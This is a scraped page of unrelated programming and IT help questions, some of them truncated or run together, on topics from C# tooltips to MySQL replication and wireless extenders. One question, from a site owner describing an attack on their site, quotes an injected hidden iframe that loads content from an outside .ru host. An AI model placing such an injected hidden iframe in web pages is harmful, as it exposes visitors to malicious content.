• C#, hover over bitmap pixel and get the coordinates?

  Hi, does anyone know how to do this? I presume it uses some sort of event handler but i wondered if anyone could set me on my path? Also, how does one show that yellow textbox which sometimes appears when you hover over processional software and it gives some information about what to fill in the textfield, thats perferably how i wish to show the coordinates? I dont know the name of what its called. In IE 8, if you hover over the name of a tab, it comes up. Thank you in advance

  I'm fairly new to Objective-C and am confused on what falls under the unbrella of a "private API" that could cause Apple to reject my app. Does this include adding methods to existing classes? For example, I found some code on stackoverflow to recolor the tab bar icons for UITabBars with this extension to the UITabBarItem class. Is this considered a "private API"? • Refreshing the asp.net web page after validation

  Hi, I have an asp.net web page (C# 2008) where the user would enter an EmployeeID, and when they tab out of the textbox, they get a messagebox prompting them to select one of two values from a dropdown listbox. The code for the message prompt in the codebehind is : Response.Write("<script>window.alert('Please select Alpha or Beta')</script>"); After the prompt is displayed, and the user clicks "ok" and returns to the page, the text on the page appears distorted (the text in labels are a size larger, the labels get wrapped to another line etc) I tried putting a Response.Redirect("UserProfileMaint.aspx"); after the messagebox in the codebehind, but now, the messagebox does not appear; I want to display the messagebox validation, and ensure the appearance of the text on the page is not distorted. How can I do this?

• Play/pause HTML 5 video using JQuery

  I am trying to control HTML5 videos using JQuery. I have two clips in a tabbed interface, there are six tabs in total, the others just have images. I am trying to make the video clips play when their tab is clicked and then stop when any of the others are clicked. This must be a simple thing to do but I cant seem to get it to work, the code I am using to play the video is: $('#playMovie1').click(function(){ $('#movie1').play(); }); I have read that the video element needs to be exposed in a function to be able to control it but can't find an example. I am able to make it work using JS: document.getElementById('movie1').play(); Any advice would be great. Thanks

But with the currentandroid:layout_height="fill_parent"in main.xml my background is overwriting the tabs which means I am unable to see tabs. and If I makeandroid:layout_height="wrap_content"` I cannot see any change taking and tabs are still their. • Ubuntu 10.10, taskbar

  I launched system monitor to kill one program, which didn't responded on any mouse clicks, etc. But i occasionally killed another process. so, taskbar was killed. (it was in the bottom of the screen, in the top all is good) reboot didnt help o_O. Now I use Alt-Tab and alt-controll-arrows to switch between programs and desktops (it works). How to launch taskbar again? its very strange that reboot didnt help me.

  I am new in iPhone Distribution . I created Apple ID U765UXW88D.com.edwincs.*. and provisioning profile name is MobileHealthGuide. I made these in Distribution tab. My xcode version is 3.2.4 While uploading application with application loader , I got this error Application failed codesign verification. The signature was invalid, or it was not signed with an Apple submission certificate. My project name is MobileHealthGuide too. I have tried revoking the certificate and provisioning profile, but the error persists. How can I solve this problem?

• Custom Header Menu in Android App (How To)

  I'm trying to implement a custom header menu in my Android application and I'm wondering what the standard or best practice for creating a header menu. I'm thinking something like the facebook app that displays a log and has some action items like triggering a search and possibly return back to the main activity. Tab Layout doesn't seem to be what I'm looking for. I found a tutorial here that might be close to what I'm looking for but not sure. It seems a bit redundant to instantiate a menu in every Activity. Seems like there would be a way to decouple the Activity from the menu, or at least more loosely couple it. Perhaps I need to implement something with Fragments but I'm sort of new, so I'm not sure yet. Looking forward to your suggestions or hearing how you've implemented something like this. Thanks!

• How do programs handle file "opened with..." them?

  I am wondering if someone could point me in the right direction. You know how for example, in most IDEs, if you open a source file with "open with", it runs the program and opens it up? and then if you open another one, it opens it in a new tab in the same process? My question is NOT how to add a program to the shell commands, but rather: How would a C# application "receive" a PDF file for example? How would the application open the file in the same process when another file is run with it (not having to instances of the program)?

• Why are cookies unrecognized when a link is clicked from an external source (i.e. Excel, Word, etc..

  I noticed that when a link is clicked externally from the web browser, such as from Excel or Word, that my session cookie is initially unrecognized, even if the link opens up in a new tab of the same browser window. The browser ends up recognizing its cookie eventually, but I am puzzled as to why that initial link from Excel or Word doesn't work. To make it even more challenging, clicking a link works fine from Outlook. Does anybody know why this might be happening? I'm using the Zend Framework with PHP 5.3.

  I am working with django 1.6, python 2.7, firefox 30 and Mac OS 10.10 Beta. When I render the following code <video width="570" height="340" controls="controls"> <source src="/some/path/" type="video/mp4" /> </video> I get an error stating "No video with supported format and mime type found". The same code runs perfectly on Safari and Chrome (yes I still haven't checked IE). I have tried different formats for the uploaded files and looked into ad-ons which might prevent this or different coding mechanisms, though nothing has been helpful. Please help!!!!

• Problem setting up Master-Master Replication in MySQL

  I am attempting to setup Master-Master Replication on two MySQL database servers. I have followed the steps in this guide, but it fails in the middle of Step 4 with SHOW MASTER STATUS; It simply returns an empty set. I get the same 3 errors in both servers' logs. MySQL errors on SQL1: [ERROR] Failed to open the relay log './sql1-relay-bin.000001' (relay_log_pos 4) [ERROR] Could not find target log during relay log initialization [ERROR] Failed to initialize the master info structure MySQL Errors on SQL2: [ERROR] Failed to open the relay log './sql2-relay-bin.000001' (relay_log_pos 4) [ERROR] Could not find target log during relay log initialization [ERROR] Failed to initialize the master info structure The errors make no sense because I'm not referencing those files in any of my configurations. • TP-Link TL-WA701N not working good as wireless extender

  I bought the device in subject to extend the range of my WPA2/PSK-protected wifi network powered by a TP-Link TL-WR340G device (AP+router). I configured it as follows: Operation mode: Universal Repeater MAC of AP: scanned my SSID and got it Channel width: 20MHz Security options: the same as the parent AP (WPA2/PSK with AES encryption) After configuration inSSIDer shows me two APs beaconing the same SSID at different SNRs (because I was with my laptop close to the extender). After a few hours my tablet, far from the parent AP, stopped working. I found that the scan reported two networks with the same SSID: one WPA-protected and one free at all. This happened very frequently. Rebooting the extender by unplugging it worked but this doesn't last long. Sometimes the extender stops transmitting at all, sometimes it beacons an open network to which nobody can connect (because there is no DHCP). What's wrong with my configuration?

  A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and it's source was from a site q5x.ru (do not link). A Google search didn't help me in figuring out how this attack my have took place, so I was wondering if anyone of you may have encountered this same problem? The iframe code was something of the sort: <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe> As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

• droid cam makefile understanding and error

  I tried installing the droid cam on my fedora 19 (64 bit) . Link to the droid cam application is here and whenever I try to install it , the Makefile which is as follows is invoked obj-m := v4l2loopback-dc.o all: make -C /lib/modules/`uname -r`/build M=`pwd` test: gcc test.c -o test clean: make -C /lib/modules/`uname -r`/build M=`pwd` clean insmod: sudo insmod v4l2loopback-dc.ko width=320 height=240 rmmod: sudo rmmod v4l2loopback-dc.ko and here is the error -- INSTALL: Webcam parameters: '320' and '240' -- INSTALL: Building v4l2loopback-dc.ko make -C /lib/modules/`uname -r`/build M=`pwd` make: *** /lib/modules/3.9.5-301.fc19.x86_64/build: No such file or directory. Stop. make: *** [all] Error 2 -- INSTALL: v4l2loopback-dc.ko not built.. Failure build happens to be a symbolic link.I was wondering what exactly is the makefile trying to and why is it failing?

• 2 pdfs look same on XP, different on Win7

  I have 2 pdf files. I compared them with WinMerge, BeyondCompare, and even compared their checksums. They are exactly the same to me in every way. If I open them with Adobe Reader in Xp, and compare them with my bare eyes, they look the same. But!!! If I open them with Adobe Reader in Win7, and compare them with my bare eyes, they look very different!(particularly border width). I'm sorry I cannot share the 2 pdf files but I will appreciate it if anyone could come up with any idea!

• avconv and ffmpeg - drawtext filter text_w evaluates as 0 in Ubuntu Precise

  I'm attempting to draw text onto a video using either the avconv or ffmpeg commands. When specifying x= for where on the final video to place the text, the 'text_w' value is evaluating to 0, rather than the width of the rendered text as it should. I'm using Ubuntu 12.04 I've got avconv version 0.8.3-4:0.8.3-0ubuntu0.12.04.1 and ffmpeg version 0.8.3-4:0.8.3-0ubuntu0.12.04.1 Example command: avconv -i test.mov -vf "drawtext=fontfile='/usr/share/fonts/truetype/ttf-dejavu/DejaVuSans.ttf':text='test text':x=text_w:y=50:fontsize=24:fontcolor=black" texted.mov This command causes the text to be printed as if x were set to 0. • Are animated GIFs supported in Google Chrome?

  I have recently been testing a website and found animated gif images that seem to show fine in IE and Firefox but in Google Chrome they only show briefly and then dissapear! This happens if I view the image on the page or view the file directly. Are there any reported problems in displaying GIFs in Chrome, or is it just being fussy? There seemed to have been some problems in older versions of Chrome, but it's hard to believe something as simple as this wouldn't have been fixed by now. The version of Google Chrome I am using is: 4.1.249.1021 Not sure if this is relevant, but some info about the image: Width: 216 pixels Height: 36 pixels Horizontal resolution: 96dpi Vertical resolution: 96dpi Bit Depth: 32 Frame Count: 3 EDIT: Seems to be a problem relating to the latest beta version of Chrome, as it works fine in 4.0.249

• Inserting a very long Excel table into Word

  I have a very long excel (2003) s/sheet with in excess of 600 rows that I want to paste into an MS Word document (also 2003). However, I want to ensure that: 1) The header row appears automatically at the top of each page. 2) The s/sheet automatically formats to the correct page width (the one I have is slightly wider than my Word page). This can obviously be done manually by cutting and pasting each page seperately but this is very laborious and time consuming and I once saw somebody achieve this automatically (maybe with a macro) but have been unable to locate them, or the methodology. • Ubuntu, No wireless networks found after correctly installed madwifi

  Hi, I just installed madwifi on my MSI laptop with an Atheros AR5001 wifi card & Lucid. As far as I can see and according to System - Administration - Hardware drivers the install was successful and the card + driver is up and running. However, I don't see any wireless network (my windows PC can see about 5 wireless networks). I tried it with the network manager applet as well as with wicd. If I try to connect to "Hidden Wireless Network" via nm-applet, it will start to connect for a while but is unable too (although I supply it with the correct WEP settings & key) So, I'm unable to use my wireless network. What am i doing wrong? • is there a way to group desktop icons on the task bar

  i have a folder on the desktop which has a bunch of programs i use frequently, i can't pin all these programs to the taskbar themselves as there are too many for the screen width that it'll just make the taskbar scrollable i am wondering if i can do one of the following pin the icons to the taskbar under 1 icon pin the folder to the taskbar separately to the Windows Explorer button which when there are no folders open will open up the libraries and if there are folders it'll show me the folders open, this way if i have 5 folders open and my frequently used programs folder i can just click on the frequently used programs folder icon on the taskbar and be given that folder only i'm trying to reduce the number of clicks, scrolling or scanning across the task bar i need to do in order to find a program
